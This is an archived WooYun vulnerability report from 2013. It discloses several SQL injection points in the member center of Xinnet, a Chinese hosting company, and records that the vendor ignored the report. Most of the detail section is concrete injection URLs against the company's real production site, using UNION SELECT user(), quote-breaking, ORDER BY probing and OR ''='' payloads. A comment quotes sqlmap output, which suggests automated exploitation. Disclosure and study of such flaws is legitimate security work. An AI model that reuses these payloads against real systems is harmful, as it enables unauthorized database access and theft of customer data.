当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020339

漏洞标题:新网多处SQL注射

相关厂商:新网华通信息技术有限公司

漏洞作者: kobin97

提交时间:2013-03-20 09:35

修复时间:2013-03-25 09:36

公开时间:2013-03-25 09:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-20: 细节已通知厂商并且等待厂商处理中
2013-03-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

新网多处SQL注射

详细说明:

具体不整理了,都是会员中心,到处都是注射
http://www.xinnet.com/account/transaction.do?method=list&endDate=&jyType=&page=&pageNum=&productType=D&type=N%27/**/union/**/select/**/user%28%29,null,null,null,null,null,null,null,null,null,null%23
http://www.xinnet.com/account/transaction.do?method=list&endDate=&jyType=&page=&pageNum=&type=N&productType=D%27
http://www.xinnet.com/account/transaction.do?method=list&jyType=&page=&pageNum=&endDate=%27
http://www.xinnet.com/account/invoice.do?method=listOpened&endDate=&money=&startDate=&title=%27%20or%20%27%27=%27
http://www.xinnet.com/vhost/manager.do?method=listRenewAndUpgrade&beginDate=&domain=&endDate=%27%20and%201=1%20and%20%27%27=%27
http://www.xinnet.com/domain/domainAuditManage.do?domainName=&domainTypeSearch=%27%27&from=search&from=search&method=showAllDomainList&rnsStatus=&serviceState=%27%27
http://www.xinnet.com/domain/domainAuditManage.do?domainName=&domainTypeSearch=%27%27&from=search&from=search&method=showAllDomainList&rnsStatus=&serviceState=%27%20order%20by%208%23
http://www.xinnet.com/domain/domainAuditManage.do?domainName=&from=search&from=search&method=showAllDomainList&domainTypeSearch=%27%20union%20select%201,user%28%29,null,null,null,null,null,null,null%23

漏洞证明:

2.jpg


3.jpg

修复方案:

估计是程序架构出现问题了。。。

版权声明:转载请注明来源 kobin97@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-03-25 09:36

厂商回复:

漏洞Rank:10 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-20 09:44 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @小亚 @kobin97 你们这是要闹哪样?

  2. 2013-03-20 20:00 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @Finger 一个你的洞引起的血案。。。。。。

  3. 2013-03-26 23:25 | 少校 ( 实习白帽子 | Rank:40 漏洞数:5 | 别开枪,自己人!)

    [23:24:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'